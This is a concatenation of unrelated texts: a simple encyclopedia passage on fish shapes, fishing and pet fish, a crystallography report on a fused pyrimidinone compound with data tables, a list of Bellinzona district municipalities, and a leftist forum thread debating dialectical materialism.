The picture on the right shows a shark. This shark's shape is called fusiform, and it is an ovoid shape where both ends of the fish are pointy. This is the best shape for going through water quickly. Fishes with fusiform shapes can chase prey and escape predators quickly. Many live in the open ocean and swim constantly, like marlins, swordfish, and tuna. Ichthyosaurs, porpoises, dolphins, killer whales all have similar shapes. This is an example of convergent evolution.
Eel-like
The long, ribbon-like shape of an eel's body shows another shape. This enables them to hide in cracks, springing out quickly to capture prey, then returning quickly to their hiding spot.
Flatfish
Flatfish live on the bottom of the ocean or lake. Most use camouflage: they change colours to match the ocean floor. During their early lives, their eyes move to the upper side of their flat body.
Reef fish also have flat bodies, and their body is often highly coloured. Flat bodies can slip in and out among the corals, sponges, and rocks, avoiding predators. Angelfish, surgeonfish, and butterflyfish are examples.
Fish as food
Some people eat many different kinds of fish. These include carp, cod, herring, perch, sardines, sturgeon, tilapia, trout, tuna, and many others. A person who buys and sells fish for eating is called a fishmonger.
The word to fish is also used for the activity of catching fishes. People catch fish with small nets from the side of the water or from small boats, or with big nets from big boats. People can also catch fish with fishing poles and fishhooks with bait. This is often called angling. Anglers also different types of fishing lures.
Because people are catching too many fish for food or other uses, there are less and less fish in the sea. This is a problem known as overfishing.
Fish as pets
Selective breeding of carp made them into the domesticated koi in Japan, and goldfish in China. This breeding began over 2,000 years ago. The Chinese brought their goldfish indoors during the Song Dynasty. They kept them in large ceramic vessels. That we now do in glass fish tanks. |
Related literature {#sec1}
==================
For the crystal structures of other fused pyrimidinone derivatives and related literature, see: Ding *et al.* (2004[@bb2]); Hu *et al.* (2005[@bb3], 2006[@bb5], 2007[@bb4], 2008[@bb6]).
Experimental {#sec2}
============
{#sec2.1}
### Crystal data {#sec2.1.1}
C~20~H~21~N~5~O~4~*M* *~r~* = 395.42Orthorhombic,*a* = 19.9810 (11) Å*b* = 37.3673 (19) Å*c* = 10.7181 (6) Å*V* = 8002.5 (7) Å^3^*Z* = 16Mo *K*α radiationμ = 0.09 mm^−1^*T* = 295 K0.20 × 0.20 × 0.10 mm
### Data collection {#sec2.1.2}
Bruker SMART 4K CCD area-detector diffractometerAbsorption correction: multi-scan (*SADABS*; Sheldrick, 2003[@bb7]) *T* ~min~ = 0.981, *T* ~max~ = 0.99121970 measured reflections2074 independent reflections1883 reflections with *I* \> 2σ(*I*)*R* ~int~ = 0.042
### Refinement {#sec2.1.3}
*R*\[*F* ^2^ \> 2σ(*F* ^2^)\] = 0.043*wR*(*F* ^2^) = 0.109*S* = 1.092074 reflections290 parameters5 restraintsH atoms treated by a mixture of independent and constrained refinementΔρ~max~ = 0.14 e Å^−3^Δρ~min~ = −0.11 e Å^−3^
{#d5e441}
Data collection: *SMART* (Bruker, 2001[@bb1]); cell refinement: *SAINT-Plus* (Bruker, 2001[@bb1]); data reduction: *SAINT-Plus*; program(s) used to solve structure: *SHELXS97* (Sheldrick, 2008[@bb8]); program(s) used to refine structure: *SHELXL97* (Sheldrick, 2008[@bb8]); molecular graphics: *PLATON* (Spek, 2009[@bb9]); software used to prepare material for publication: *SHELXTL* (Sheldrick, 2008[@bb8]).
Supplementary Material
======================
Crystal structure: contains datablocks I, global. DOI: [10.1107/S1600536810032654/bt5323sup1.cif](http://dx.doi.org/10.1107/S1600536810032654/bt5323sup1.cif)
Structure factors: contains datablocks I. DOI: [10.1107/S1600536810032654/bt5323Isup2.hkl](http://dx.doi.org/10.1107/S1600536810032654/bt5323Isup2.hkl)
Additional supplementary materials: [crystallographic information](http://scripts.iucr.org/cgi-bin/sendsupfiles?bt5323&file=bt5323sup0.html&mime=text/html); [3D view](http://scripts.iucr.org/cgi-bin/sendcif?bt5323sup1&Qmime=cif); [checkCIF report](http://scripts.iucr.org/cgi-bin/paper?bt5323&checkcif=yes)
Supplementary data and figures for this paper are available from the IUCr electronic archives (Reference: [BT5323](http://scripts.iucr.org/cgi-bin/sendsup?bt5323)).
The authors are grateful to Dr Y. G. Hu (Institute of Medicinal Chemistry, Hubei Medical University, Shiyan, China) for help with synthesis and analysis. This work was supported by the Education Commission of Hubei Province of China (grant No. B20102107) and Shiyan Municipal Science and Technology Bureau (grant No. 2010-037s).
Comment
=======
Fused pyrimidine compounds are valued not only for their rich and varied chemistry, but also for many important biological properties. On the other hand, heterocycles containing triazoles nucleus also exhibit various biological activities.
The introduction of an triazole ring to the furopyrimidine system is expected to influence the biological activities significantly. As a part of our ongoing investigations on the preparation of derivatives of heterocyclic compounds (Ding *et al.*, (2004), Hu *et al.*, 2005, 2006, 2007, 2008), we have synthesized and structurally characterized characterized the title compound, and here we wish to report an X-ray crystal structure of it(Fig. 1).
In the molecule, the bond lengths and angles are unexceptional. In the title compound the ring system containing the three fused rings is essentially planar (r.m.s. deviation for all 12 non-H atoms 0.041 Å). The phenyl ring makes a dihedral angles of 54.41 (06)° with this ring system. The isopropyl group in molecule is disordered over two positions, with site occupancy factors 0.753 (9) and 0.247 (9); The structure is mainly stabilized by intermolecular weak N---H···O and intramolecular C---H···O hydrogen bonding interactions (Table 1) and π-π interactions with interplanar distances of 3.537Å between adjacent furan ring centroids (symmetry code: -*x*, -*y*, *z*) and 3.681Å between phenyl and pyrimidinone rings (symmetry code: 1/4 + *x*,1/4 - *y*,1/4 + *z*).
Experimental {#experimental}
============
The title compound was obtained in excellent yield *via* aza-Wittig reaction. Crystals suitable for single-crystal X-ray diffraction were obtained by recrystallization from a mixed solvent of ethanol and dichloromethane (1:2 *v*/*v*) at room temperature.
Refinement {#refinement}
==========
In the absence of anomalous scatterers, 2307 Friedel pairs were merged. All H atoms were located in difference maps and treated as riding atoms, with C---H = 0.93 Å, *U*~iso~ = 1.2*U*~eq~ (C) for C*sp*^2^, C---H = 0.98 Å, *U*~iso~ = 1.2*U*~eq~ (C) for CH, C---H = 0.97 Å, *U*~iso~ = 1.2*U*~eq~ (C) for CH~2~, C---H = 0.96 Å, *U*~iso~ = 1.5*U*~eq~ (C) for CH~3~. The coordinates of the H atom bonded to N were refined with *U*~iso~ = 1.2*U*~eq~(N) and the N---H distance restrained to 0.86 (1) Å. The bond distances and 1--3 distances in the disordered groups were restrained to be equal within an effective e.s.d. of 0.01 Å.
Figures
=======
{#Fap1}
Crystal data {#tablewrapcrystaldatalong}
============
----------------------- ---------------------------------------
C~20~H~21~N~5~O~4~ *F*(000) = 3328
*M~r~* = 395.42 *D*~x~ = 1.313 Mg m^−3^
Orthorhombic, *Fdd*2 Mo *K*α radiation, λ = 0.71073 Å
Hall symbol: F 2 -2d Cell parameters from 3861 reflections
*a* = 19.9810 (11) Å θ = 2.2--20.8°
*b* = 37.3673 (19) Å µ = 0.09 mm^−1^
*c* = 10.7181 (6) Å *T* = 295 K
*V* = 8002.5 (7) Å^3^ Block, purple
*Z* = 16 0.20 × 0.20 × 0.10 mm
----------------------- ---------------------------------------
Data collection {#tablewrapdatacollectionlong}
===============
--------------------------------------------------------------- --------------------------------------
Bruker SMART 4K CCD area-detector diffractometer 2074 independent reflections
Radiation source: fine-focus sealed tube 1883 reflections with *I* \> 2σ(*I*)
graphite *R*~int~ = 0.042
φ and ω scans θ~max~ = 27.0°, θ~min~ = 2.2°
Absorption correction: multi-scan (*SADABS*; Sheldrick, 2003) *h* = −25→24
*T*~min~ = 0.981, *T*~max~ = 0.991 *k* = −44→47
21970 measured reflections *l* = −13→13
--------------------------------------------------------------- --------------------------------------
Refinement {#tablewraprefinementdatalong}
==========
------------------------------------- -------------------------------------------------------------------------------------------------
Refinement on *F*^2^ Primary atom site location: structure-invariant direct methods
Least-squares matrix: full Secondary atom site location: difference Fourier map
*R*\[*F*^2^ \> 2σ(*F*^2^)\] = 0.043 Hydrogen site location: inferred from neighbouring sites
*wR*(*F*^2^) = 0.109 H atoms treated by a mixture of independent and constrained refinement
*S* = 1.09 *w* = 1/\[σ^2^(*F*~o~^2^) + (0.0601*P*)^2^ + 2.4148*P*\] where *P* = (*F*~o~^2^ + 2*F*~c~^2^)/3
2074 reflections (Δ/σ)~max~ \< 0.001
290 parameters Δρ~max~ = 0.14 e Å^−3^
5 restraints Δρ~min~ = −0.11 e Å^−3^
------------------------------------- -------------------------------------------------------------------------------------------------
Special details {#specialdetails}
===============
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Geometry. All e.s.d.\'s (except the e.s.d. in the dihedral angle between two l.s. planes) are estimated using the full covariance matrix. The cell e.s.d.\'s are taken into account individually in the estimation of e.s.d.\'s in distances, angles and torsion angles; correlations between e.s.d.\'s in cell parameters are only used when they are defined by crystal symmetry. An approximate (isotropic) treatment of cell e.s.d.\'s is used for estimating e.s.d.\'s involving l.s. planes.
Refinement. Refinement of *F*^2^ against ALL reflections. The weighted *R*-factor *wR* and goodness of fit *S* are based on *F*^2^, conventional *R*-factors *R* are based on *F*, with *F* set to zero for negative *F*^2^. The threshold expression of *F*^2^ \> σ(*F*^2^) is used only for calculating *R*-factors(gt) *etc*. and is not relevant to the choice of reflections for refinement. *R*-factors based on *F*^2^ are statistically about twice as large as those based on *F*, and *R*- factors based on ALL data will be even larger.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Fractional atomic coordinates and isotropic or equivalent isotropic displacement parameters (Å^2^) {#tablewrapcoords}
==================================================================================================
------- --------------- --------------- ------------- -------------------- ------------
*x* *y* *z* *U*~iso~\*/*U*~eq~ Occ. (\<1)
C1 0.25088 (16) 0.07862 (8) 0.2745 (4) 0.0618 (8)
H1 0.2634 0.0694 0.1974 0.074\*
C2 0.29491 (17) 0.07774 (9) 0.3748 (4) 0.0743 (11)
H2 0.3378 0.0685 0.3640 0.089\*
C3 0.2759 (2) 0.09026 (10) 0.4890 (4) 0.0829 (12)
H3 0.3052 0.0889 0.5562 0.099\*
C4 0.2140 (2) 0.10476 (12) 0.5044 (4) 0.0831 (11)
H4 0.2011 0.1133 0.5822 0.100\*
C5 0.17048 (18) 0.10680 (10) 0.4059 (3) 0.0678 (9)
H5 0.1287 0.1173 0.4167 0.081\*
C6 0.18834 (15) 0.09340 (8) 0.2912 (3) 0.0520 (7)
C7 0.07894 (14) 0.07677 (7) 0.1978 (3) 0.0487 (6)
C8 0.14928 (15) 0.10258 (7) 0.0675 (3) 0.0517 (7)
C9 0.21415 (19) 0.12881 (12) −0.1012 (4) 0.0790 (11)
H9A 0.1973 0.1093 −0.1537 0.095\* 0.76
H9B 0.1720 0.1295 −0.1479 0.095\* 0.24
C10 0.1741 (3) 0.16260 (18) −0.1310 (7) 0.107 (2) 0.76
H10A 0.1276 0.1584 −0.1149 0.160\* 0.76
H10B 0.1801 0.1687 −0.2173 0.160\* 0.76
H10C 0.1896 0.1819 −0.0796 0.160\* 0.76
C11 0.2851 (3) 0.1340 (3) −0.1290 (7) 0.137 (3) 0.76
H11A 0.3032 0.1519 −0.0745 0.205\* 0.76
H11B 0.2901 0.1416 −0.2141 0.205\* 0.76
H11C 0.3086 0.1118 −0.1168 0.205\* 0.76
C11\' 0.2599 (11) 0.1007 (4) −0.153 (2) 0.125 (8) 0.24
H11D 0.2996 0.0995 −0.1023 0.188\* 0.24
H11E 0.2718 0.1067 −0.2367 0.188\* 0.24
H11F 0.2376 0.0780 −0.1514 0.188\* 0.24
C10\' 0.2513 (12) 0.1649 (3) −0.110 (3) 0.187 (17) 0.24
H10D 0.2212 0.1840 −0.0881 0.281\* 0.24
H10E 0.2674 0.1684 −0.1932 0.281\* 0.24
H10F 0.2885 0.1649 −0.0528 0.281\* 0.24
C12 −0.00778 (15) 0.06210 (8) 0.0432 (3) 0.0575 (8)
C13 −0.03791 (14) 0.04496 (8) 0.1483 (3) 0.0592 (8)
C14 −0.00908 (14) 0.04888 (8) 0.2641 (3) 0.0549 (7)
C15 −0.09993 (16) 0.02527 (8) 0.1723 (4) 0.0680 (10)
C16 −0.10362 (17) 0.02052 (9) 0.2962 (4) 0.0715 (10)
C17 −0.1520 (2) 0.00305 (13) 0.3833 (5) 0.0982 (14)
H17A −0.1864 −0.0087 0.3360 0.147\*
H17B −0.1719 0.0209 0.4361 0.147\*
H17C −0.1289 −0.0142 0.4336 0.147\*
C18 −0.1456 (2) 0.00781 (11) 0.0816 (5) 0.0832 (12)
C19 −0.1552 (3) −0.01350 (12) −0.1254 (6) 0.1117 (18)
H19A −0.1946 0.0006 −0.1452 0.134\*
H19B −0.1697 −0.0370 −0.0976 0.134\*
C20 −0.1128 (4) −0.0169 (2) −0.2349 (7) 0.158 (3)
H20A −0.0985 0.0064 −0.2614 0.237\*
H20B −0.1375 −0.0282 −0.3009 0.237\*
H20C −0.0743 −0.0312 −0.2147 0.237\*
N1 0.14054 (11) 0.09293 (6) 0.1915 (2) 0.0506 (6)
N2 0.05524 (11) 0.07635 (6) 0.0793 (2) 0.0511 (6)
N3 0.09879 (12) 0.09351 (6) −0.0029 (2) 0.0538 (6)
N4 0.20563 (14) 0.11862 (8) 0.0286 (3) 0.0636 (7)
H4A 0.2249 (17) 0.1327 (8) 0.081 (3) 0.076\*
N5 0.04897 (13) 0.06436 (7) 0.2978 (2) 0.0568 (6)
O1 −0.02832 (11) 0.06660 (6) −0.0623 (2) 0.0728 (7)
O2 −0.04849 (11) 0.03475 (6) 0.3546 (2) 0.0695 (6)
O3 −0.20042 (15) −0.00291 (9) 0.1061 (4) 0.1254 (13)
O4 −0.11678 (14) 0.00387 (7) −0.0285 (3) 0.0887 (9)
------- --------------- --------------- ------------- -------------------- ------------
Atomic displacement parameters (Å^2^) {#tablewrapadps}
=====================================
------- ------------- ------------- ------------- -------------- -------------- --------------
*U*^11^ *U*^22^ *U*^33^ *U*^12^ *U*^13^ *U*^23^
C1 0.0516 (17) 0.0511 (16) 0.083 (2) −0.0037 (13) −0.0061 (16) 0.0058 (16)
C2 0.0521 (19) 0.0555 (18) 0.115 (3) −0.0055 (15) −0.021 (2) 0.016 (2)
C3 0.088 (3) 0.073 (2) 0.088 (3) −0.015 (2) −0.043 (2) 0.015 (2)
C4 0.094 (3) 0.091 (3) 0.065 (2) −0.010 (2) −0.020 (2) 0.0011 (19)
C5 0.063 (2) 0.079 (2) 0.062 (2) −0.0057 (16) −0.0053 (17) 0.0026 (16)
C6 0.0479 (16) 0.0494 (15) 0.0587 (17) −0.0094 (13) −0.0064 (13) 0.0071 (13)
C7 0.0428 (15) 0.0493 (15) 0.0540 (16) −0.0008 (12) −0.0032 (14) −0.0011 (13)
C8 0.0534 (17) 0.0475 (15) 0.0542 (17) 0.0004 (13) 0.0045 (14) −0.0061 (13)
C9 0.081 (2) 0.098 (3) 0.0576 (19) −0.019 (2) 0.0117 (18) −0.0011 (19)
C10 0.120 (5) 0.113 (5) 0.088 (4) −0.002 (4) 0.018 (4) 0.035 (4)
C11 0.089 (4) 0.226 (10) 0.096 (5) −0.018 (6) 0.039 (4) 0.026 (6)
C11\' 0.18 (2) 0.093 (14) 0.105 (15) −0.018 (15) 0.062 (16) −0.013 (12)
C10\' 0.26 (4) 0.110 (17) 0.19 (3) 0.06 (2) 0.16 (3) 0.081 (19)
C12 0.0508 (17) 0.0457 (16) 0.076 (2) 0.0031 (13) −0.0168 (16) −0.0029 (15)
C13 0.0449 (17) 0.0515 (17) 0.081 (2) −0.0002 (13) −0.0078 (16) −0.0001 (16)
C14 0.0446 (15) 0.0510 (16) 0.0692 (19) −0.0032 (13) 0.0058 (14) −0.0018 (14)
C15 0.0450 (18) 0.0517 (18) 0.107 (3) −0.0007 (14) −0.0087 (18) 0.0031 (18)
C16 0.0485 (18) 0.0585 (19) 0.108 (3) −0.0056 (14) 0.0049 (18) −0.0043 (19)
C17 0.074 (3) 0.091 (3) 0.130 (4) −0.023 (2) 0.029 (3) −0.012 (3)
C18 0.058 (2) 0.061 (2) 0.131 (4) −0.0096 (17) −0.028 (2) 0.021 (2)
C19 0.120 (4) 0.063 (2) 0.152 (5) −0.015 (2) −0.081 (4) 0.011 (3)
C20 0.194 (7) 0.151 (5) 0.129 (5) −0.003 (5) −0.057 (5) −0.036 (5)
N1 0.0410 (12) 0.0554 (13) 0.0552 (13) −0.0055 (10) −0.0011 (11) 0.0000 (11)
N2 0.0470 (13) 0.0505 (13) 0.0558 (14) −0.0007 (10) −0.0048 (11) −0.0009 (11)
N3 0.0586 (15) 0.0519 (13) 0.0509 (13) −0.0039 (11) −0.0029 (12) −0.0036 (11)
N4 0.0601 (16) 0.0739 (17) 0.0566 (16) −0.0145 (14) 0.0082 (13) −0.0032 (13)
N5 0.0484 (14) 0.0619 (15) 0.0601 (14) −0.0057 (11) 0.0008 (12) −0.0012 (12)
O1 0.0743 (15) 0.0658 (13) 0.0783 (16) −0.0078 (11) −0.0312 (13) 0.0074 (12)
O2 0.0551 (13) 0.0702 (14) 0.0832 (15) −0.0106 (11) 0.0130 (12) −0.0042 (12)
O3 0.0740 (18) 0.139 (3) 0.163 (3) −0.0538 (19) −0.031 (2) 0.036 (3)
O4 0.0692 (16) 0.0697 (16) 0.127 (3) −0.0056 (13) −0.0370 (18) −0.0125 (16)
------- ------------- ------------- ------------- -------------- -------------- --------------
Geometric parameters (Å, °) {#tablewrapgeomlong}
===========================
----------------------- ------------ ---------------------- -------------
C1---C6 1.378 (4) C11\'---H11D 0.9600
C1---C2 1.389 (5) C11\'---H11E 0.9600
C1---H1 0.9300 C11\'---H11F 0.9600
C2---C3 1.364 (7) C10\'---H10D 0.9600
C2---H2 0.9300 C10\'---H10E 0.9600
C3---C4 1.361 (6) C10\'---H10F 0.9600
C3---H3 0.9300 C12---O1 1.215 (4)
C4---C5 1.370 (5) C12---N2 1.421 (4)
C4---H4 0.9300 C12---C13 1.429 (5)
C5---C6 1.374 (5) C13---C14 1.376 (5)
C5---H5 0.9300 C13---C15 1.464 (5)
C6---N1 1.434 (4) C14---N5 1.345 (4)
C7---N5 1.312 (4) C14---O2 1.357 (4)
C7---N2 1.355 (4) C15---C16 1.342 (6)
C7---N1 1.373 (3) C15---C18 1.483 (6)
C8---N3 1.305 (4) C16---O2 1.374 (4)
C8---N4 1.342 (4) C16---C17 1.494 (6)
C8---N1 1.387 (4) C17---H17A 0.9600
C9---N4 1.452 (5) C17---H17B 0.9600
C9---C11 1.461 (7) C17---H17C 0.9600
C9---C11\' 1.496 (11) C18---O3 1.196 (5)
C9---C10 1.528 (7) C18---O4 1.321 (6)
C9---C10\' 1.543 (11) C19---O4 1.446 (5)
C9---H9A 0.9800 C19---C20 1.454 (9)
C9---H9B 0.9800 C19---H19A 0.9700
C10---H9B 1.2497 C19---H19B 0.9700
C10---H10A 0.9600 C20---H20A 0.9600
C10---H10B 0.9600 C20---H20B 0.9600
C10---H10C 0.9600 C20---H20C 0.9600
C11---H11A 0.9600 N2---N3 1.394 (3)
C11---H11B 0.9600 N4---H4A 0.86 (3)
C11---H11C 0.9600
C6---C1---C2 118.9 (3) C9---C10\'---H10E 109.5
C6---C1---H1 120.6 H10D---C10\'---H10E 109.5
C2---C1---H1 120.6 C9---C10\'---H10F 109.5
C3---C2---C1 120.7 (3) H10D---C10\'---H10F 109.5
C3---C2---H2 119.7 H10E---C10\'---H10F 109.5
C1---C2---H2 119.7 O1---C12---N2 120.1 (3)
C4---C3---C2 119.9 (4) O1---C12---C13 130.8 (3)
C4---C3---H3 120.1 N2---C12---C13 109.1 (3)
C2---C3---H3 120.1 C14---C13---C12 119.1 (3)
C3---C4---C5 120.4 (4) C14---C13---C15 104.5 (3)
C3---C4---H4 119.8 C12---C13---C15 136.1 (3)
C5---C4---H4 119.8 N5---C14---O2 118.4 (3)
C4---C5---C6 120.3 (4) N5---C14---C13 130.4 (3)
C4---C5---H5 119.9 O2---C14---C13 111.1 (3)
C6---C5---H5 119.9 C16---C15---C13 106.7 (3)
C5---C6---C1 119.9 (3) C16---C15---C18 123.8 (4)
C5---C6---N1 119.9 (3) C13---C15---C18 128.8 (4)
C1---C6---N1 120.1 (3) C15---C16---O2 110.9 (3)
N5---C7---N2 127.0 (3) C15---C16---C17 135.3 (4)
N5---C7---N1 127.2 (3) O2---C16---C17 113.8 (4)
N2---C7---N1 105.8 (2) C16---C17---H17A 109.5
N3---C8---N4 125.8 (3) C16---C17---H17B 109.5
N3---C8---N1 112.9 (2) H17A---C17---H17B 109.5
N4---C8---N1 121.3 (3) C16---C17---H17C 109.5
N4---C9---C11 110.1 (4) H17A---C17---H17C 109.5
N4---C9---C11\' 103.9 (10) H17B---C17---H17C 109.5
N4---C9---C10 110.8 (4) O3---C18---O4 123.9 (5)
C11---C9---C10 110.8 (6) O3---C18---C15 124.5 (5)
C11\'---C9---C10 145.3 (10) O4---C18---C15 111.5 (3)
N4---C9---C10\' 110.0 (11) O4---C19---C20 108.0 (5)
C11\'---C9---C10\' 107.3 (9) O4---C19---H19A 110.1
N4---C9---H9A 108.3 C20---C19---H19A 110.1
C11---C9---H9A 108.3 O4---C19---H19B 110.1
C10---C9---H9A 108.3 C20---C19---H19B 110.1
C10\'---C9---H9A 141.5 H19A---C19---H19B 108.4
N4---C9---H9B 113.3 C19---C20---H20A 109.5
C11---C9---H9B 136.6 C19---C20---H20B 109.5
C11\'---C9---H9B 110.9 H20A---C20---H20B 109.5
C10\'---C9---H9B 111.1 C19---C20---H20C 109.5
C9---C10---H10A 109.5 H20A---C20---H20C 109.5
C9---C10---H10B 109.5 H20B---C20---H20C 109.5
H9B---C10---H10B 95.8 C7---N1---C8 105.9 (2)
C9---C10---H10C 109.5 C7---N1---C6 124.5 (2)
H9B---C10---H10C 147.0 C8---N1---C6 128.8 (2)
C9---C11---H11A 109.5 C7---N2---N3 111.6 (2)
C9---C11---H11B 109.5 C7---N2---C12 124.7 (3)
C9---C11---H11C 109.5 N3---N2---C12 123.6 (2)
C9---C11\'---H11D 109.5 C8---N3---N2 103.7 (2)
C9---C11\'---H11E 109.5 C8---N4---C9 120.9 (3)
H11D---C11\'---H11E 109.5 C8---N4---H4A 116 (3)
C9---C11\'---H11F 109.5 C9---N4---H4A 114 (3)
H11D---C11\'---H11F 109.5 C7---N5---C14 109.0 (3)
H11E---C11\'---H11F 109.5 C14---O2---C16 106.8 (3)
C9---C10\'---H10D 109.5 C18---O4---C19 117.4 (4)
C6---C1---C2---C3 2.1 (5) N4---C8---N1---C6 −8.7 (5)
C1---C2---C3---C4 −2.0 (5) C5---C6---N1---C7 −56.1 (4)
C2---C3---C4---C5 0.2 (6) C1---C6---N1---C7 120.2 (3)
C3---C4---C5---C6 1.6 (6) C5---C6---N1---C8 135.5 (3)
C4---C5---C6---C1 −1.5 (5) C1---C6---N1---C8 −48.2 (4)
C4---C5---C6---N1 174.8 (3) N5---C7---N2---N3 176.9 (3)
C2---C1---C6---C5 −0.3 (5) N1---C7---N2---N3 −3.0 (3)
C2---C1---C6---N1 −176.6 (3) N5---C7---N2---C12 0.2 (5)
O1---C12---C13---C14 −168.6 (3) N1---C7---N2---C12 −179.6 (2)
N2---C12---C13---C14 8.9 (4) O1---C12---N2---C7 171.4 (3)
O1---C12---C13---C15 3.6 (6) C13---C12---N2---C7 −6.5 (4)
N2---C12---C13---C15 −178.8 (3) O1---C12---N2---N3 −4.9 (4)
C12---C13---C14---N5 −6.7 (5) C13---C12---N2---N3 177.2 (2)
C15---C13---C14---N5 178.9 (3) N4---C8---N3---N2 177.0 (3)
C12---C13---C14---O2 172.3 (3) N1---C8---N3---N2 −1.2 (3)
C15---C13---C14---O2 −2.2 (3) C7---N2---N3---C8 2.6 (3)
C14---C13---C15---C16 2.1 (4) C12---N2---N3---C8 179.3 (2)
C12---C13---C15---C16 −170.9 (4) N3---C8---N4---C9 2.3 (5)
C14---C13---C15---C18 −168.0 (3) N1---C8---N4---C9 −179.6 (3)
C12---C13---C15---C18 19.0 (6) C11---C9---N4---C8 −160.5 (6)
C13---C15---C16---O2 −1.3 (4) C11\'---C9---N4---C8 −103.2 (11)
C18---C15---C16---O2 169.4 (3) C10---C9---N4---C8 76.5 (5)
C13---C15---C16---C17 −179.8 (4) C10\'---C9---N4---C8 142.2 (10)
C18---C15---C16---C17 −9.1 (7) N2---C7---N5---C14 3.4 (4)
C16---C15---C18---O3 23.7 (6) N1---C7---N5---C14 −176.8 (3)
C13---C15---C18---O3 −167.7 (4) O2---C14---N5---C7 −179.0 (3)
C16---C15---C18---O4 −153.1 (4) C13---C14---N5---C7 −0.1 (5)
C13---C15---C18---O4 15.5 (5) N5---C14---O2---C16 −179.5 (3)
N5---C7---N1---C8 −177.7 (3) C13---C14---O2---C16 1.4 (3)
N2---C7---N1---C8 2.1 (3) C15---C16---O2---C14 0.0 (4)
N5---C7---N1---C6 11.6 (5) C17---C16---O2---C14 178.9 (3)
N2---C7---N1---C6 −168.6 (2) O3---C18---O4---C19 2.0 (6)
N3---C8---N1---C7 −0.5 (3) C15---C18---O4---C19 178.8 (3)
N4---C8---N1---C7 −178.8 (3) C20---C19---O4---C18 −176.6 (4)
N3---C8---N1---C6 169.5 (3)
----------------------- ------------ ---------------------- -------------
Hydrogen-bond geometry (Å, °) {#tablewraphbondslong}
=============================
------------------ ---------- ---------- ----------- ---------------
*D*---H···*A* *D*---H H···*A* *D*···*A* *D*---H···*A*
N4---H4A···O1^i^ 0.86 (3) 2.21 (2) 2.978 (4) 148 (3)
C17---H17A···O3 0.96 2.49 3.132 (7) 124\.
------------------ ---------- ---------- ----------- ---------------
Symmetry codes: (i) *x*+1/4, −*y*+1/4, *z*+1/4.
###### Hydrogen-bond geometry (Å, °)
*D*---H⋯*A* *D*---H H⋯*A* *D*⋯*A* *D*---H⋯*A*
------------------ ---------- ---------- ----------- -------------
N4---H4*A*⋯O1^i^ 0.86 (3) 2.21 (2) 2.978 (4) 148 (3)
C17---H17*A*⋯O3 0.96 2.49 3.132 (7) 124
Symmetry code: (i) .
|
Bellinzona is a district of the canton of Ticino in Switzerland.
Circles and municipalities
circle of Bellinzona: Bellinzona, Arbedo-Castione, Lumino;
circle of the Ticino: Monte Carasso, Gudo, Sementina, Gorduno, Gnosca, Preonzo, Moleno;
circle of Giubiasco: Giubiasco, Pianezzo, Sant'Antonio, Camorino, Sant'Antonino, Cadenazzo, Medeglia, Isone.
Districts of Ticino |
Welcome to RevLeft, our collective online space!
RevLeft has chalked up more than 2.5 million posts since 2001 and is now the oldest and biggest leftist discussion board on the web. Its basis is to provide a neutral discussion platform for the whole spectrum of the radical Left. Here everyone can discuss current political trends, theory, and historical issues and more from a revolutionary perspective.
Join thousands of fellow leftists from around the world and get in touch. Register your account and start posting now!
Anti-Dialectics site....
Comrades, I was debating on another forum earlier with some liberals and libertarians about capitalism, and one of them pointed me to this website in an attempt to discredit Dialectical Materialism (a site owned by a self-proclaimed Marxist). http://www.anti-dialectics.co.uk/Ant...So,_What_Is_DM
What do you guys make of this? Personally, I think this dude vulgarizes DM into being some 'deterministic' philosophy (even though DM is anti-dogmatic by its very essence) in his attempt to discredit it. In my opinion, DM is the backbone of Marxism, and to take it out of Marxism is an abandonment of it, since Marx and Engels clearly used dialectics in almost all their work. What are your guys thoughts? Sorry if this site has been posted before but I'm really curious.
To be honest, there is a saying that I feel applies to the initial reaction that this site will probably garner here:
No investigation, no right to speak!
So all I will say is that without dialetics, there is no Marxism. That's a simple fact. This doesn't say anything about dialetics it's self, perhaps Marxism is wrong after all, I haven't engaged their material enough to say, but no Marxist can denounce dialectics and continue to be a Marxist. But again, perhaps Marxism is wrong. After all communism exists outside of the Marxist framework and I suppose one could still be a Communist without applying dialetics.
Men vanish from earth leaving behind them the furrows they have ploughed. I see the furrow Lenin left sown with the unshatterable seed of a new life for mankind, and cast deep below the rolling tides of storm and lightning, mighty crops for the ages to reap.
~Helen Keller
To despise the enemy strategically is an elementary requirement for a revolutionary. Without the courage to despise the enemy and without daring to win, it will be simply impossible to make revolution and wage a people’s war, let alone to achieve victory. ~Lin Biaohttp://commiforum.forumotion.com/
The Following 4 Users Say Thank You to Yet_Another_Boring_Marxist For This Useful Post:
Yea I agree. I mean, Marx didn't even coin the phrase or state explicitly (that I know of) that DM was central to his thought, but it is pretty self-evident that he used it extensively and thus we kind of accept it by default as being one of the central themes of Marxism as a system. Of course, maybe Marxism is wrong, but that is another matter altogether. For now, we accept it, and in doing so, it makes no sense to reject DM like this guy does. I mean, its like taking the concept of adaptation out of the process of evolution, which at that point it ceases to be evolution! This site absolutely blew my mind (not in a good way).
The Following User Says Thank You to Marxaveli For This Useful Post:
Yea I agree. I mean, Marx didn't even coin the phrase or state explicitly (that I know of) that DM was central to his thought, but it is pretty self-evident that he used it extensively and thus we kind of accept it by default as being one of the central themes of Marxism as a system. Of course, maybe Marxism is wrong, but that is another matter altogether. For now, we accept it, and in doing so, it makes no sense to reject DM like this guy does. I mean, its like taking the concept of adaptation out of the process of evolution, which at that point it ceases to be evolution!
The very basis of Marx's critique of capitalism in Das Kapital begins with Marx noting that each commodity is a contradiction between it's use value and it's extange value. It's late so I wont' do it right now, but in the afternoon tommorow I can cite various quotes to show where the dialectics forms the basis of Marxist political economy and the critique of capitalism.
So to be honest, I just don't see where that leaves Marx's critique of capitalism if you remove dialectics. I guess you could vulgarize the Tendency for the Rate of Profit to Decline into some sort of semi-Keynesian rubbish about technology decreasing demand until capitalism dies, but that takes away almost all of the punch and uniqueness in Marx's critique of capitalism.
Men vanish from earth leaving behind them the furrows they have ploughed. I see the furrow Lenin left sown with the unshatterable seed of a new life for mankind, and cast deep below the rolling tides of storm and lightning, mighty crops for the ages to reap.
~Helen Keller
